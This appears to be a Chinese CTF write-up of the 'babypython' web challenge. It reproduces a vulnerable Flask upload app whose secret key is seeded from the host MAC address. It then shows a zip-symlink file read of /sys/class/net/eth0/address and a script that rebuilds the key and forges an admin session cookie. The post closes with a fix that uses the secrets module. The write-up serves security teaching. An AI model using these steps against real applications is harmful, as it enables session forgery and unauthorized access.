web

buu-awdp

babypython

考点:软链接读mac主机获得随机数种子伪造admin 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74

# -*- coding: utf-8 -*-
from flask import Flask,session,render_template,redirect, url_for, escape, request,Response
import uuid
import base64
import random
import secret
from werkzeug.utils import secure_filename
import os
random.seed(uuid.getnode())
app = Flask(__name__)
app.config['SECRET_KEY'] = str(random.random()*100)
app.config['UPLOAD_FOLDER'] = './uploads'
app.config['MAX_CONTENT_LENGTH'] = 100 * 1024
ALLOWED_EXTENSIONS = set(['zip'])

def allowed_file(filename):
    return '.' in filename and \
           filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS


@app.route('/', methods=['GET'])
def index():
    error = request.args.get('error', '')
    
    if(error == '1'):
        session.pop('username', None)
        return render_template('index.html', forbidden=1)
    if not 'username' in session:
        session['username'] = "guest"

    if 'username' in session:
        return render_template('index.html', user=session['username'], secret=secret.secret)
    else:
        
        return render_template('index.html')


@app.route('/upload', methods=['POST'])
def upload_file():
    if 'the_file' not in request.files:
        return redirect(url_for('index'))
    file = request.files['the_file']
    if file.filename == '':
        return redirect(url_for('index'))
    if file and allowed_file(file.filename):
        filename = secure_filename(file.filename)
        file_save_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)
        if(os.path.exists(file_save_path)):
            return 'This file already exists'
        file.save(file_save_path)
    else:
        return 'This file is not a zipfile'


    try:
        extract_path = file_save_path + '_'
        os.system('unzip -n ' + file_save_path + ' -d '+ extract_path)
        read_obj = os.popen('cat ' + extract_path + '/*')
        file = read_obj.read()
        read_obj.close()
        os.system('rm -rf ' + extract_path)
    except Exception as e:
        file = None

    os.remove(file_save_path)
    if(file != None):
        if(file.find(base64.b64decode('ZmxhZw==').decode('utf-8')) != -1):
            return redirect(url_for('index', error=1))
    return Response(file)


if __name__ == '__main__':
    #app.run(debug=True)
    app.run(host='127.0.0.1', debug=False, port=10008)

image-20251212213554833

结合代码,显然要伪造admin,这里种子是uuid.getnode()-用来获取当前主机的的MAC地址,所以要用软链接拿MAC地址,软链接读取/sys/class/net/eth0/address

1
2

ln -s  /sys/class/net/eth0/address link
zip --symlinks link.zip link

得到36:28:50:90:bb:2f,然后伪造session得到flag

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22


import random
from flask import Flask, session
from flask.sessions import SecureCookieSessionInterface
app = Flask(__name__)
random.seed(int("36285090bb2f",16))
app.secret_key =str(random.random()*100)
print(app.secret_key)

# 创建一个会话对象
session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)

# 要序列化的数据
data = {
    'username': "admin"
}
# 序列化并加密数据
serialized = session_serializer.dumps(data)
print("Encoded session:", serialized)

decoded = session_serializer.loads(serialized)
print("Decoded session:", decoded)

加固就是用secrets模块,secrets模块可以提供比较强的随机数

1
2
3

import secrets
app.config['SECRET_KEY'] = str(secrets.randbelow(10000000000))
#或者app.config['SECRET_KEY'] =secrets.token_hex(16)
Emo
谢谢观看
© 2025 - 2026 luokaihong
使用 Hugo 构建
主题 StackJimmy 设计